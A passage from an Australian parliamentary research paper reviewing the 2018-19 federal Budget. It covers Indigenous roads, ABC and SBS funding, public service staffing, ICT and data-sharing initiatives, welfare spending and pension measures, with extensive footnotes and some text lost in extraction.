• the Budget provides funding for roads in remote areas serving Indigenous communities, including $180 million for the Central Arnhem Road Upgrade, $100 million for the Buntine Highway Upgrade, $160 million for the Outback Way through central Australia, and $1.5 billion for roads in ‘Northern Australia’. This is previously committed funding, and media reports indicate most funding will not be distributed until 2022-23.662 Infrastructure Australia has previously recommended increased road funding to remote Indigenous communities.663 Warren Snowdon, the Labor Member for Lingiari, criticised the announcement, stating that the cost of a full upgrade for the Central Arnhem Road would be between $500 million and $1 billion664
• $28.3 million over four years for the Remote Airstrip Upgrade Programme, which provides vital airstrip maintenance and upgrades to many remote Indigenous communities and
• in the Agriculture portfolio, investment in forestry on Indigenous land through the $20 million ‘National Forestry Industry Plan’ measure. Forestry projects have been of particular interest to Indigenous peoples of the Cape York Peninsula, including the Wik.665
According to the Minister for Indigenous Affairs Nigel Scullion’s budget media release, the Budget includes $2 million over three years for the Australian Institute of Aboriginal and Torres Strait Islander Affairs (AIATSIS) ‘for a program of preservation and celebration of Indigenous languages and culture’.666 In the PM&C Portfolio Budget Statement, this is listed as funding to commemorate the 250th Anniversary of James Cook’s Voyage that will be drawn from the Contingency Reserve.667 This appears to refer to the ‘cultural engagement and consultation with Indigenous
659. Department of the Prime Minister and Cabinet (PM&C), Remote Housing Review: a review of the National Partnership Agreement on Remote Indigenous Housing and the Remote Housing Strategy (2008-2018), PM&C, 2017, pp. 15-21. 660. Ibid., pp. 22-25. 661. Ibid., pp. 31-33. 662. ‘NT not happy about 5-year road cash delays’, SBS News, 9 May 2018. 663. Infrastructure Australia, Infrastructure priority list: Australian Infrastructure Plan: project and initiative summaries, March
2018.
664. W Snowdon (Member for Lingiari), Turnbull is for the top end of town. Not the top end, media release, 8 May 2018. 665. G Marley, ‘Tigercat takes on Far North Queensland’, Australian Forests and Timber, 1 December 2017. 666. N Scullion (Minister for Indigenous Affairs), 2018-19 Budget to strengthen economic, employment and health opportunities for First Australians, op. cit.
667. Australian Government, Portfolio budget statements 2018-19: budget related paper no. 1.14: Prime Minister and Cabinet Portfolio, p.89.
communities, including specialised training for Indigenous cultural heritage professionals in regional areas’ mentioned in the Communication and the Arts budget measure ‘250th Anniversary of James Cook’s Voyage - commemoration’. Local traditional owners have been described as giving ‘cautious support’ to the measure.668
668. National Indigenous Television (NITV), ‘New Captain Cook monument draws mixed response from Indigenous community’, 30 April 2018.
Funding for the national broadcasters
Dr Tyson Wils
Australian Broadcasting Corporation (ABC)
Since 1989, the ABC has been funded by a three-year appropriation known as the triennial funding system. For the upcoming triennial period of 2019-20 to 2021-22, the Government has said that there will be $3.16 billion in funding for the ABC.669 The Budget also states that the ABC will remain fully exempt from the efficiency dividend, which is an annual funding reduction for Commonwealth government agencies introduced in 1987-88.670 However, the Government also announced that ‘in order to ensure the ABC continues to find back-office efficiencies’ it will ‘pause indexation of the ABC’s operational funding’.671
According to the Minister for Communications and Arts, Senator Mitch Fifield:
In 2014 the Government commissioned the Lewis review into the efficiency of the ABC and SBS. The Government is confident further back office efficiencies can now be found. A further review of ABC and SBS efficiencies will be undertaken and will report later this year to assist the ABC in meeting this saving.672
The Government anticipates that the pause in indexation of ABC funding ‘will result in savings to the Budget of $83.7 million over three years’.673 The indexation pause follows ‘efficiency savings’ from the ABC (and Special Broadcasting Service (SBS)) in the 2014-15 budget of $35.5 and $8.0 million respectively.674 This was followed in November 2014 by much larger cuts of $254 million and $25 million respectively, aimed at ensuring ‘the ABC and SBS eliminate inefficiencies in their back office operations’. 675
A specific measure, due to lapse in 2018-19, allocates additional funding above the levels committed through the triennial process. This measure provides support to ABC local news and current affairs services, particularly those services outside capital cities.676 In the 2016-17 Budget, the Government allocated $41.4 million over three years for this measure.677 Senator Fifield has stated that ‘the Government has taken no decisions regarding the future of this initiative’ and that ‘funding remains in place until 30 June 2019’.678
In response to the pause in indexation, ABC Managing Director Michelle Guthrie stated that the ABC is ‘very disappointed and concerned that after the measures … introduced in recent years to deliver better and more efficient services, the government has now seen fit to deliver what amounts to a further substantial budget cut’;679 and that ‘the impact of the decision [cannot] be
669. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 79. 670. N Horne, The Commonwealth efficiency dividend: an overview, Background note, Parliamentary Library, Canberra, 13 December 2012. 671. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 79. 672. M Fifield (Minster for Communications and the Arts), Strengthening Australia’s connectivity, creativity and cultural heritage,
media release, 8 May 2018. 673. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 79. 674. Australian Government, ‘Part 2: expense measures’, Budget measures: budget paper no. 2: 2014-15, p. 66. 675. M Turnbull, National broadcasters to implement efficiency measures, media release, 19 November 2014. 676. Australian Government, Budget measures: budget paper no. 2: 2013-14, pp. 98-106. 677. Australian Government, Budget measures: Budget paper no. 2: 2016-17, p. 70. 678. M Fifield (Senator Mitch Fifield), Facebook post, 9 May 2018, accessed 9 May 2018. The Senator made this announcement in
reaction to a number of organisations and commentators who said that the Government was not renewing the special funding or had made a decision to cease it. See, for example, N Leys, ABC indexation freeze amounts to cuts, media release, 8 May 2018. 679. D Davidson, ‘Federal budget 2018: Guthrie vows to oppose ABC indexation freeze’, The Australian, 9 May 2018.
absorbed by efficiency measures alone, as the ABC had already achieved significant productivity gains in response to past budget cuts’.680
Media, Entertainment and Arts Alliance (MEAA)’s Media Director, Katelin McInerney, has said ‘It is becoming increasingly difficult for the ABC to deliver original investigative journalism and local and regional newsgathering with … deep cuts to its funding’;681 while MEAA’s Equity Director, Zoe Angus, stated that the ‘cuts also represent a dangerous threat to the creation of original Australian television production, particularly drama’.682
Special Broadcasting Service (SBS)
The Government has announced that it will provide $17.6 million in funding over two years to SBS.683
This includes $14.6 million over two years from 2018-19 to replace revenue from advertising and product placement that SBS could not raise because legislation to provide the broadcaster with further ‘advertising flexibility’ has not been passed by the Parliament.684 The Communications Legislation Amendment (SBS Advertising Flexibility) Bill 2017 proposed to amend the Special Broadcasting Service Act 1991 to allow SBS to increase its revenue base by:
• permitting it to ‘air more advertising and sponsorship announcements in prime time viewing periods’ and
• to ‘earn additional revenue through the use of product placement endorsements in its commissioned programming’.685
The Bill was laid aside by the House of Representatives on 10 August 2017.686
The Budget also includes $3.0 million for SBS to ‘support the development of Australian film and television content’.687
680. N Leys, ABC indexation freeze amounts to cuts, media release, 8 May 2018. 681. Media, Entertainment and Arts Alliance, Cuts to ABC ‘dangerous and irresponsible’, media release, 9 May 2018. 682. Ibid. 683. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 79. 684. Ibid. 685. R Jolly, Communications Legislation Amendment (SBS Advertising Flexibility) Bill 2017, Bills Digest, 98, 2016-17,
Parliamentary Library, Canberra, 2017. 686. The first Bill to give SBS more flexibility in its scheduling of advertising and sponsorship announcements was introduced by the Coalition Government in 2015. Labor Senators, Greens Senator Scott Ludlam and Independent Senator Nick Xenophon
issued a dissenting report at the conclusion of the Senate Environment and Communications Legislation Committee inquiry into the Bill, which was subsequently rejected by the Senate on 24 June 2015. For more information see ibid., pp. 6-7. 687. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 79.
Public sector efficiencies, staffing, and administrative arrangements
Philip Hamilton
From within existing resources of the Department of the Prime Minister and Cabinet, $9.8 million from 2017-18 over two years has been committed to an independent review of the Australian Public Service.688’.689
Efficiency dividend
Since 1987-88, the efficiency dividend (ED) has been an annual funding reduction for Australian government agencies, in general applied only to ‘departmental’ expenses.690’.691 The Budget does not specify the rate at which the ED will be applied in 2018-19692—however, the 2016-17 Budget stated that the ED would be maintained at 2.5 per cent through 2016-17 and 2017-18, before being reduced to 2 per cent in 2018-19 and 1.5 per cent in 2019-20.693
Efficiencies and savings: Home Affairs Portfolio
688..
689..
690.. 691. However, the Government will pause indexation of the ABC’s operational funding to achieve savings of $83.7 million over
three years from 2019-20 to 2021-22. 692. 693. Australian Government, Agency resourcing: budget paper no. 4: 2016-17, p. 2.
expenses were more than $350 million over budget.694 The Australian National Audit Office is due to table a performance audit of the merger later this month.695
Property and decentralisation.696’.697).698
Administrative arrangements—new entities.699’.
694. B Keane, ‘Immigration-Customs merger a shocker as budget blows out’, Crikey, 13 October 2016. 695. Australian National Audit Office (ANAO), ‘The integration of the Department of Immigration and Border Protection and the Australian Customs and Border Protection Service’, ANAO website. 696. V Burgess, ‘Tetris fills the gaps’, The Australian Financial Review, 4 June 2015, p. 16. 697. D Dingwall, ‘More empty desks despite moves to cut office space’, The Canberra Times, 4 May 2018, p. 3. 698.. 699. For more information, see: N Horne and P Hamilton, ‘Data sharing and release’ and P Hamilton, ‘Selected public sector ICT initiatives’, Budget review 2018-19, Research paper series, 2017-18, Parliamentary Library, Canberra, 2018.
Enterprise agreements.700
However, some enterprise agreement processes are still outstanding. Staff at the Bureau of Meteorology have rejected enterprise agreement proposals in three votes, and union members have taken strike action.701’.702
Staffing
In the 2015-16 Budget, the Government undertook to maintain the size of the General Government Sector (GGS), excluding military and reserves, at around or below the 2006-07 Average Staffing Level (ASL) of 167,596.703.704,705 it has
700. APSC, ‘Agreements made under the 2014 and 2015 bargaining policies’, APSC website. 701. D Dingwall, ‘Stormy weather possible for bureau as union targets its forecasts’, The Canberra Times, 1 May 2018, p. 6. 702. S Whyte, ‘Home Affairs tells Fair Work to ignore union bid’, The Canberra Times, 18 April 2018, p. 7. 703.. 704. M Mannheim, ‘The good news, Canberra, is there isn’t much bad news’, The Canberra Times, 9 May 2018, p. 2. 705. Joint Committee of Public Accounts and Audit, ‘Australian Government Contract Reporting - Inquiry based on Auditor-
General's report No. 19 (2017-18)’, Inquiry homepage, Australian Parliament website.
been reported that ‘Government agencies have more than doubled their spending on contracted labour in the last five years’,706 and:
Since the change of government in 2013, annual expenditure on labour contractors for 18 of the largest workplaces has ballooned from $318 million to more than $730 million. 707
The Government is reported to have ‘rejected calls for a mandated cap on external workforce spending and consultancy contracts … describing the falling cost of administration as a proportion of overall expenditure as the only relevant indicator of public service efficiency’.708 Commentators have stated that ‘using contractors for non-specialist work that could be done by public servants would not get value for money’ and that ‘you’re also not growing the capacity of your organisation because all of those skills grow outside the agency’.709
706. D Dingwall and M Mannheim, ‘Contractor spending doubles in five years’, The Canberra Times, 14 March 2018, p. 1. 707. Ibid. 708.. 709. D Dingwall and M Mannheim, ‘Contractor spending doubles in five years’, op. cit., p. 6.
Selected public sector ICT initiatives
Philip Hamilton
In the 2018-19 Budget there are new public sector information and communication technology (ICT) related Budget measures in most portfolios.710 The following selected ICT initiatives can be broadly categorised as: cyber security; whole of government and cross-portfolio; or program-specific.711
Cyber security
Following a reported cyber attack on the Bureau of Meteorology in December 2015, the 2017-18 Budget included an appropriation for a project to ‘improve the security and resilience of the Bureau of Meteorology’s … ICT systems and business processes’.712713 and being established as a statutory agency on 1 July 2018.714
Whole of government and cross-portfolio:
a key component in the further digital transformation of Government and supports the Government’s commitment to better and more accessible digital services.
Individuals will be able to prove their identity to a government agency or accredited non-government organisation, and then re-use this proven identity when accessing other government services.
In addition, with $0.7 million from within its existing resources, in 2018-19 the DTA will ‘investigate areas where blockchain technology could offer the most value for Government services’.715 The DTA will:
710..
711..
712. Australian Government, Budget measures: budget paper no. 2: 2017-18, p. 94; C Uhlmann, ‘China blamed for ‘massive’ cyber attack on Bureau of Meteorology computer’, ABC News website, 2 December 2015. 713. Department of the Prime Minister and Cabinet (PM&C), 2017 Independent Intelligence Review, PM&C, Canberra, June 2017, pp. 64-66; H Portillo-Castro, ‘Cyber policy’, Budget review 2018-19, Research paper series, 2017-18, Parliamentary Library,
Canberra, 2018. 714..
Program-specific (various portfolios)’.718’.
715. 716. Digital Transformation Agency (DTA), ‘Budget 2018-19.
717. N Horne and P Hamilton, ‘Data sharing and release’, Budget review 2018-19, Research paper series, 2017-18, Parliamentary Library, Canberra, 2018. 718. Australian Government, Agency resourcing: budget paper no. 4: 2018-19, pp. 6-7.
The Department of Home Affairs will be provided with $130.0 million in 2017-18 (including $94.0 million in capital funding) to improve the Department’s ICT capability, including to ‘upgrade the Department’s analytics and threat management capabilities.720
Monitoring ICT-related projects
ICT-related measures in the 2018-19 Budget add to those announced in 2016, 2017 (including the $500 million Public Service Modernisation Fund), and older, ongoing projects.721
Despite the increasing number of ICT-related projects and contracts, there is still no consolidated source where Parliament and citizens can track the progress of ICT projects.722
In May 2017, the Government’s ICT Procurement Taskforce recommended ‘a public dashboard of significant ICT projects and spending that will allow the government and public to see the status and outcomes of its ICT investment decisions’.723 The Government did not accept the recommendation for a public-facing dashboard.724 In 2013 the Coalition had committed to emulating the example of the USA’s IT Dashboard. New South Wales, Queensland, and Victoria already have dashboards.726
The DTA monitors all digital and ICT initiatives with a budget of more than $10 million and not classified as Secret or Top Secret. The DTA’s first and only disclosure to date was six months ago at a Senate Estimates hearing.727 The DTA tabled a list of 17 projects, but the tabled document is not
found by search engines and is not available at any other location on the internet.728 The relevant DTA webpage, last updated in November 2017, does not list the 72 projects in scope for monitoring.729
Without a public, comprehensive source of updated information about specific projects, accountability for progress and spending is largely dependent on information gleaned from
719. For other decentralisation initiatives in the Budget, see: P Hamilton, ‘Public sector efficiencies, staffing, and administrative arrangements’, Budget review 2018-19, Research paper series, 2017-18, Parliamentary Library, Canberra, 2018. 720. For more on the Department of Home Affairs, see Hamilton, ‘Public sector efficiencies, staffing, and administrative arrangements’, op. cit. 721.. 722. P Hamilton, ‘Which governments have an online dashboard so the public can monitor ICT spending and projects?’, Flagpost, Parliamentary Library blog, 30 November 2017. 723. ICT Procurement Taskforce, Report of the ICT Procurement Taskforce, DTA, 2017, p. 7. 724. A Taylor (Assistant Minister for Cities and Digital Transformation), Government response to report of the ICT Procurement Taskforce, Ministerial statement, [September 2017]. 725.. 726. New South Wales Government, ‘digital.nsw: Digital government at a glance’; Queensland Government, ‘ICT dashboard’; Victorian Department of Premier and Cabinet, ‘Victorian Government ICT dashboard’. 727. Senate Finance and Public Administration Legislation Committee, Official committee Hansard, 15 November 2017, pp. 42-44. 728. Senate Finance and Public Administration Committee, Prime Minister and Cabinet Portfolio, Supplementary Budget Estimates 2017-18, ‘DTA, Information in relation to current projects undertaken by the Digital Transformation Agency’, tabled document. 729. DTA, ‘Oversight delivers early insights’, DTA website, 10 November 2017.
irregular and narrowly targeted sources such as Australian National Audit Office performance audits and Senate Estimates hearings.730
730. For example: Australian National Audit Office (ANAO), Cybersecurity follow-up audit, Audit report, 42, 2016-17, ANAO, Canberra, 2017; ANAO, Unscheduled taxation system outages, Audit report, 29, 2017-18, ANAO, Canberra, 2018.
Data sharing and release Nicholas Horne and Philip Hamilton
The 2018-19 Budget provides a total of $65.1 million over 2018-2022 for significant new data sharing and release arrangements.731 Agencies in the Prime Minister and Cabinet portfolio will account for $20.5 million of this funding ($15.4 million in additional funding and $5.1 million coming from agencies’ existing resources), and agencies within the Treasury portfolio will account for $44.6 million (all additional funding).732
The new data sharing and release arrangements will span:
⢠‘developing guidance on data sharing arrangements’
⢠‘monitoring and addressing risks and ethical considerations on data use’
⢠‘managing the process for high value datasets’, and
⢠the establishment of a new ‘national consumer data right’ (CDR) relating to the transfer of data between service providers in specified sectors.733
The first three of these elements will be the subject of legislation and will be the responsibility of a new entity to be established, the National Data Commissioner. Introduction of the new CDR will be via legislation—‘primarily through changes to the Competition and Consumer Act 2010 [Cth]’.734 The Government has stated that introduction of the CDR will start in the banking, energy and telecommunications sectors.735 Treasury portfolio agencies will have carriage of introducing the CDR as follows:
⢠the Australian Competition and Consumer Commission (ACCC) will assess the cost/benefit of ‘designating sectors that will be subject to the CDR’736 and will develop rules for CDR governance and data standards
⢠the Office of the Australian Information Commissioner (OAIC) will examine the privacy impact, and
⢠the Commonwealth Scientific and Industrial Research Organisation will finalise the data standards.737
The ACCC and OAIC will have responsibility for, respectively, oversight of the CDR system and consumer complaints concerning the CDR.738
The origin of the new data sharing and release arrangements lies in a 2017 Productivity Commission report on data availability and use. The Productivity Commission made a number of recommendations including a new legislative regime for data sharing and release, a
731. The budget figures in this brief have been taken from the following document unless otherwise sourced: Australian Government, Budget Measures 2018-19: Budget Paper No.2: 2018-19, pp. 166, 186. 732. Prime Minister and Cabinet portfolio agencies are the Departments of: the Prime Minister and Cabinet; Agriculture and Water Resources; Education and Training; Home Affairs; Industry, Innovation and Science; Health; Human Services; and Social
Services, with other portfolio agencies including the Australian Bureau of Statistics and the Australian Taxation Office. Treasury portfolio agencies are the Australian Competition and Consumer Commission, the Commonwealth Scientific and Industrial Research Organisation, and the Office of the Australian Information Commissioner. 733. Australian Government, Budget Measures 2018-19: Budget Paper No.2: 2018-19, op. cit., p. 186. 734. Department of the Prime Minister and Cabinet (DPMC), ‘Data availability and use: the Australian Government’s response to the Productivity Commission data availability and use inquiry: the consumer data right’, DPMC website. 735. Ibid. 736. Australian Government, Budget Measures 2018-19: Budget Paper No.2: 2018-19, op. cit., p. 186. 737. Ibid. 738. DPMC, ‘Data availability and use: the Australian Government’s response to the Productivity Commission data availability and use inquiry: the consumer data right’, op. cit.
comprehensive right for consumers and small/medium businesses concerning data use, and a national data custodian to oversee the new data sharing and release arrangements.739
Shortly before the Budget, in its response to the Productivity Commission’s recommendations, the Government announced the creation of the new National Data Commissioner, new legislation governing data sharing and release, and the creation of the new CDR.740
Commentary on the new data sharing and release arrangements has emphasised the significance of the CDR as a ‘major regulatory change’ while raising doubts about existing federal government capability for its implementation.741
In its report the Productivity Commission outlined comparable data governance arrangements in New Zealand, the United Kingdom and the European Union, where a General Data Protection Regulation will come into effect on 25 May 2018.742
739. Productivity Commission, Data Availability and Use: Productivity Commission Inquiry Report No. 82, Productivity Commission, Canberra, March 2017, p. 2. 740. M Keenan (Minister for Human Services and Minister Assisting the Prime Minister for Digital Transformation), M Sukkar (Assistant Minister to the Treasurer), Government response to Productivity Commission inquiry into data availability and use,
media release, 1 May 2018; DPMC, ‘Data availability and use: the Australian Government’s response to the Productivity Commission data availability and use inquiry’, op. cit. 741. T Burton, ‘Canberra creates a brave new data world’, The Mandarin, 3 May 2018. 742. Productivity Commission, Data Availability and Use: Productivity Commission Inquiry Report No. 82, op. cit., pp. 498-507.
Welfare expenditure: an overview Michael Klapdor
Social security and welfare expenditure in 2018-19 is estimated to total $176.0 billion, representing 36 per cent of the Australian Government’s total expenses.743 This administrative category of expenditure consists of a broad range of services and payments to individuals and families. It includes:
⢠most income support payments such as pensions and allowances (for example, the Age Pension and Newstart Allowance)
⢠family payments such as Family Tax Benefit and the new Child Care Subsidy
⢠Parental Leave Pay
⢠funding for aged care services
⢠the National Disability Insurance Scheme (NDIS) and
⢠payments and services for veterans and their dependants..744
Figure 1: estimated Australian Government expenses on social security and welfare, $m
Source: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, pp. 6-23-6-27.
743. The budget figures in this brief have been taken from the following document unless otherwise sourced: Australian Government, Budget strategy and outlook: budget paper no. 1: 2018-19, pp. 3-24, 6-23-6-27. 744. The majority of expenditure on these payments and services is provided through special appropriations rather than the annual Appropriation Bills.
Key drivers of expenditure increases.745
Expenditure on payments for job-seekers (including Newstart Allowance and Youth Allowance (Other)) will increase slightly from $11.1 billion in 2017-18 to $11.9 billion in 2021-22.
A number of areas are expected to see a decline in expenditure:
⢠A decrease in the number of veterans and their dependants will result in a 17.5 per cent decrease in veterans’ community care and support expenditure in real terms from 2018-19 to 2021-22.
⢠Family Tax Benefit expenditure will decrease from $18.5 billion in 2017-18 to $17.9 billion in 2021-22 despite population growth—primarily as a result of policy measures to restrict eligibility and freeze the indexation of payment rates and income test thresholds.
⢠Parenting Payment expenses will decrease by 3.5 per cent in real terms from 2018-19 to 2021-22 as a result of enhanced compliance measures.
Parameter changes.
No increase in allowance payment rates
Despite a concerted campaign from community groups, supported by key business lobby groups, the Government did not announce any budget measures to raise the level of support for those on Newstart Allowance or Youth Allowance.746 In fact, the Government will proceed with its proposal to close the Energy Supplement—a reduction in the level of assistance to new recipients of these allowance payments, and to new recipients of all income support payments.747 Media reports prior to the Budget suggested the Government would reverse this 2016-17 budget measure.748
745. Ibid., p. 6-23. 746. Australian Council of Social Service (ACOSS), ‘Raise the rate’, ACOSS website; T McIlroy, ‘Westacott dismisses MP’s talk of living on $40 a day’, Australian Financial Review, 4 May 2018, p. 6.
747. M Klapdor, ‘Power play: will the Energy Supplement be saved’, FlagPost, Parliamentary Library blog, 27 March 2018. 748. S Martin, ‘Treasurer to backflip on pension cut’, West Australian, 2 May 2018, p. 8.
‘Finances for a longer life’ measures Lauren Cook and Don Arthur
The Government has announced three measures designed to help older Australians with their finances:
⢠new means testing rules for innovative retirement income streams
⢠increasing and extending the Pension Work Bonus and
⢠expanding the Pension Loans Scheme.
New means testing rules for innovative retirement income streams
In July 2017, regulations took effect that enabled the development of new innovative lifetime retirement income stream products, including pooled lifetime retirement products.750 However, it was unclear how the means test rules for the Age Pension should apply to these new products. The means test for the Age Pension applies an income test and an asset test and whichever test results in the lower payment rate is applied.
In January 2018, the Australian Government sought stakeholder views on the proposed means test rules for lifetime retirement income streams. This included income testing 70 per cent of all product payments as income, and asset testing a consistent asset value of 70 per cent of the product purchase price until life expectancy at purchase, and 35 per cent for the rest of the person’s life.751 This proposed approach was a change from current rules that incorporate complicated capital reduction rules and deduction amounts in determining income and asset amounts for the purposes of means testing.752
In the Budget, the Australian Government announced new means testing rules for Age Pension recipients who purchase pooled lifetime retirement products after 1 July 2019.753 The new rules will assess a fixed 60 per cent of all pooled lifetime product payments as income, and 60 per cent of the purchase price of the product as assets until age 84, or a minimum of five years, and then 30 per cent for the rest of the person’s life.754
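The fixed proportions in the new rules lend themselves to a simple calculation. The sketch below is illustrative only: the function name and sample figures are invented, and it applies just the 60/30 proportions described above rather than the full social security means test.

```python
# Illustrative sketch of the 60/30 assessment rules for pooled lifetime
# retirement products announced in the 2018-19 Budget. The function name
# and sample figures are invented; the real means test involves many more
# rules than are modelled here.

def assessable_amounts(purchase_price, annual_payments, age, years_held):
    """60% of product payments count as income; 60% of the purchase price
    counts as an asset until age 84 (minimum five years from purchase),
    then 30% for the rest of the person's life."""
    income = 0.60 * annual_payments
    if age < 84 or years_held < 5:
        assets = 0.60 * purchase_price
    else:
        assets = 0.30 * purchase_price
    return income, assets

# A hypothetical $100,000 product paying $6,000 a year:
print(assessable_amounts(100_000, 6_000, age=80, years_held=3))
print(assessable_amounts(100_000, 6_000, age=85, years_held=10))
```

Note the minimum holding period: a recipient aged 85 who bought the product only four years ago would still be assessed at the higher 60 per cent asset proportion under this reading of the rules.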
This measure is part of a package of measures designed to improve retirement income choices, including requiring superannuation fund trustees to develop a retirement income strategy, and requiring providers to simplify product disclosure statements for retirement income products.755 Peak body COTA Australia has welcomed these measures as a way to ‘improve the standard of living for older Australians’.756
The measure will cost $20.2 million over five years from 2017-18 as the rate of payment for Age Pension calculated under the new income and assets tests is likely to be higher for recipients with pooled lifetime retirement products. This measure will require legislation.
750. Treasury Laws Amendment (2017 Measures No. 1) Regulations 2017. 751. Department of Social Services (DSS), Means test rules for lifetime retirement income streams, Position paper, DSS, Canberra, 7 February 2018, p. 9. 752. Australian Government, ‘General provisions for assessing income streams’, Guide to social security law, DSS website,
11 May 2015. 753. Australian Government, Budget measures: budget paper no. 2: 2018-19, p. 175. 754. DSS, More Choices for a Longer Life—finances for a longer life, fact sheet, DSS, Canberra, May 2018. 755. Australian Government, op. cit., p. 185. 756. COTA Australia, Federal Budget 2018 —welcome commitment to better planning for an ageing population and aged care,
media release, 8 May 2018.
Increasing and extending the Pension Work Bonus
The Government is making changes to the Pension Work Bonus to allow pensioners to keep more of their earnings. These changes are expected to benefit around 88,750 social security pensioners, 1,000 allowees and around 3,000 Veterans’ Affairs pensioners.757 The Budget provides $227.4 million over the forward estimates.758 This measure will require legislation.
How the Pension Work Bonus currently works
The Pension Work Bonus encourages pensioners to earn additional income through work. It is available to all pensioners over Age Pension age, including recipients of payments such as Disability Support Pension and Carer Payment.
The Pension Work Bonus works with the pension income test free area. With the free area a single pensioner can receive up to $168 in income per fortnight without it affecting their pension. The Pension Work Bonus enables a pensioner to earn an additional $250 per fortnight without losing pension income, but it operates differently from the income test free area.759
There are two important differences. First, while the income free area allows income from any source, only income from paid work as an employee counts for the Pension Work Bonus. It does not include income from self-employment or business income. Second, if a pensioner does not use their full Pension Work Bonus amount in a fortnight, they can bank the unused part up to a maximum of $6,500 and use it later. This is particularly useful for pensioners who undertake intermittent or seasonal work.760
Changes to the Pension Work Bonus
This budget measure makes two changes to the Pension Work Bonus:
⢠the bonus amount will increase from $250 to $300 with the maximum accrual account rising to $7,800 and
⢠eligibility for the Pension Work Bonus will be expanded to include income from self-employment (with a ‘personal exertion test’ to exclude income associated with returns on investments).
Expansion of the Pension Loans Scheme
The Pension Loans Scheme enables individuals over pension age to borrow against the equity they have in their family home or other real estate to obtain fortnightly payments. The loan can be repaid from the person’s estate after they die. The Government is expanding the scheme to allow more people to benefit and to increase the amount they can receive as an income stream.
Currently take up of the scheme has been low. In 2015 there were around 800 participants.761 The Department of Social Services expects around 6,000 people to take up a loan under the revised scheme over the next four years.762
This measure is expected to cost $11 million over the forward estimates. It will require changes to legislation.763
757. DSS, op. cit. 758. Australian Government, op. cit., p. 175. 759. DSS, ‘Work Bonus’, DSS website, last updated 14 September 2016. 760. Ibid. 761. Parliamentary Budget Office (PBO), ‘Costing outside the caretaker period’ (Pension Loans Scheme), PBO, Canberra,
12 October 2015. 762. DSS, More Choices for a Longer Life—finances for a longer life, fact sheet, DSS, Canberra, May 2018. 763. Ibid.
How the Pension Loans Scheme currently works
The Pension Loans Scheme is a reverse mortgage scheme that allows people of pension age to access an income stream by borrowing against their housing equity.
The Pension Loans Scheme allows people to top up a part pension to the full rate or, for those not eligible for any pension, receive fortnightly payments equivalent to the full rate. It is open to people of pension age (or their partners) who have equity in Australian real estate that they can use as security for the loan. To be eligible the person or their partner must receive no pension or a reduced rate of pension due to the income or assets test (but not both). It is not available to those receiving the full rate of pension. Compound interest is charged on the loan and it is normally repaid if the home is sold or repaid from the person’s estate after their death.764
The Government charges compound interest of 5.25 per cent on the outstanding loan balance.765
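The effect of compound interest at that rate can be seen with a short back-of-the-envelope calculation. This sketch assumes fortnightly drawdowns with fortnightly compounding, which is only an approximation of the scheme’s actual mechanics.

```python
# Back-of-the-envelope sketch of how a Pension Loans Scheme balance grows
# at the 5.25 per cent compound rate quoted in the text. Fortnightly
# drawdowns and fortnightly compounding are assumed for illustration; the
# scheme's actual compounding mechanics may differ.

def loan_balance(fortnightly_payment, years, annual_rate=0.0525):
    rate = annual_rate / 26              # approximate per-fortnight rate
    balance = 0.0
    for _ in range(int(years * 26)):
        balance = balance * (1 + rate) + fortnightly_payment
    return balance

# Drawing $500 a fortnight for ten years ($130,000 drawn in total):
print(f"balance after 10 years: ${loan_balance(500, 10):,.0f}")
```

On these assumptions the balance owed after ten years noticeably exceeds the total amount drawn down, which is why commentators compare the 5.25 per cent rate against commercial reverse mortgage rates.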
Changes to the Pension Loans Scheme
This measure expands eligibility for the Pension Loans Scheme to all Australians of Age Pension age, including people receiving the full rate of the pension and self-funded retirees. It also increases the amount individuals can receive as an income stream to 150 per cent of the Age Pension rate.
Stakeholder reactions and media commentary
Reactions to these budget measures have been mixed, with some stakeholders and commentators expressing scepticism about the benefits for older people while others have reacted more positively.
The Combined Pensioners and Superannuants Association (CPSA) labelled the Budget a ‘fizzer’, arguing that the Pension Work Bonus and Pension Loans Scheme measures are minor.766
Ben Oquist of the Australia Institute praised changes to the Pension Loans Scheme as ‘sensible economic reform’ that could ‘make a real difference to people’s lives’.767 Newspaper commentator Daryl Dixon was also positive about changes to the scheme, noting that the 5.25 per cent compound interest rate was below the rates charged for commercial reverse mortgages.768
In the West Australian, Nick Bruining and Neale Prior were less enthusiastic about the Pension Loans Scheme noting that there are no limits on the Minister for Social Services’ power to increase the interest rate.769
764. Department of Social Services (DSS), ‘Pension Loans Scheme’, DSS website, last updated 29 January 2016. 765. Department of Human Services (DHS), ‘Pension Loans Scheme costs and interest rates’, DHS website, last updated 6 February 2018. 766. Combined Pensioners and Superannuants Association (CPSA), Budget 2018 a fizzer for older Australians, media release, 8 May
2018.
767. The Australia Institute, Evidence backing Scott Morrison plan to expand Pension Loan Scheme, media release, 8 May 2018. 768. D Dixon, ‘Loan scheme extension is great news’, The Canberra Times, 13 May 2018. 769. N Prior and N Bruining, ‘New loan scheme numbers not so attractive’, The West Australian, 14 May 2018.
Veterans’ Affairs M.770
The only significant new savings measure for the portfolio is a package of changes to dental and allied health services which is expected to deliver $40.7 million in savings over four years from 2018-19.771 The package includes changes to fee schedules to align with industry standards, changing the ‘treatment cycle’ for general practitioner (GP) referrals to allied health services so that they are valid for 12 sessions rather than 12 months, and trialling new funding models.772 DVA intends to further review allied health fee schedules from 2021.773
Veteran Centric Reform Program.774
The new budget allocation will provide for the second stage of the program: updating the 13 IT systems supporting the delivery of income support payments (such as the Service Pension) and other systems supporting the delivery of compensation (such as incapacity and permanent impairment payments).775 The additional funding will also be used to implement:
⢠a single phone number, 1800VETERAN, for access to DVA services
⢠outreach programs to veterans and their families who are not in contact with DVA
⢠measures to use ‘the power of data’ to anticipate the needs of veterans and their families and then offer them relevant services and support and
⢠increased choice of aids and appliances. 776
A 2016 Senate Foreign Affairs, Defence and Trade Committee inquiry into the mental health of serving ADF members and veterans set out a range of problems with DVA’s processes and service
